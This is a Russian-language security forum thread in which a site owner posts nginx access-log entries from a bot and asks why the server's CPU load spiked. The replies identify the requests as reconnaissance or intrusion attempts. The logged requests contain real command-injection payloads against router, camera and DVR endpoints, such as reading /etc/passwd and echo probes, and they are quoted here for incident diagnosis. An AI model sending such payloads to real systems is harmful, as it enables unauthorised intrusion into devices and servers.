The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

форумы  правила/FAQ  поиск  регистрация  вход/выход  слежка  RSS
"Непонятные записи в /var/log/nginx/access.log"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Обнаружение и предотвращение атак / Linux)
Изначальное сообщение [ Отслеживать ]

"Непонятные записи в /var/log/nginx/access.log"  +/
Сообщение от Romanson (ok) on 26-Окт-17, 02:49 
Приветствую!

Вот эти записи:
220.72.145.24 - - [25/Oct/2017:19:18:18 +0300] "GET / HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:18 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "POST /command.php HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:19 +0300] "GET /system.ini?loginuse&loginpas HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;echo+nuuo+123456;%27 HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:20 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:21 +0300] "GET /board.cgi?cmd=cat%20/etc/passwd HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:21 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:22 +0300] "POST /hedwig.cgi HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:22 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "POST /apply.cgi HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20AAA** *BBB|||%20%3b&ping_size=&ping_times=5&traceroute_ip=\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:23 +0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/¤tsetting.htm=1&cmd=echo+dgn+123456 HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1" 301 186 "-" "-" "-"
220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"

После этих записей нагрузка CPU стала быстро расти до 100% и сайт висит!
Что это такое?

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Непонятные записи в /var/log/nginx/access.log"  +/
Сообщение от Одъминъ on 26-Окт-17, 17:45 
>[оверквотинг удален]
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> После этих записей нагрузка CPU стала быстро расти до 100% и сайт
> висит!
> Что это такое?

Разведка или попытка взлома.
Смотри, есть ли у тебя файлы, перечисленные в запросах, доступны ли они снаружи.
Особенно интересный запрос:
GET /board.cgi?cmd=cat /etc/passwd, проверь, не появился ли новый пользак с правами рута или wheel.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Непонятные записи в /var/log/nginx/access.log"  +/
Сообщение от ыы on 26-Окт-17, 21:15 
>[оверквотинг удален]
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:24 +0300] "GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "GET /shell?echo+jaws+123456;cat+/proc/cpuinfo
> HTTP/1.1" 301 186 "-" "-" "-"
> 220.72.145.24 - - [25/Oct/2017:19:18:25 +0300] "\x00" 400 174 "-" "-" "-"
> После этих записей нагрузка CPU стала быстро расти до 100% и сайт
> висит!
> Что это такое?

это http 301

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Непонятные записи в /var/log/nginx/access.log"  +/
Сообщение от Pahanivo (ok) on 27-Окт-17, 17:59 
боты нюхают дыры ...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема


  Закладки на сайте
  Проследить за страницей
Created 1996-2018 by Maxim Chirkov  
ДобавитьРекламаВебмастеруГИД  
Hosting by Ihor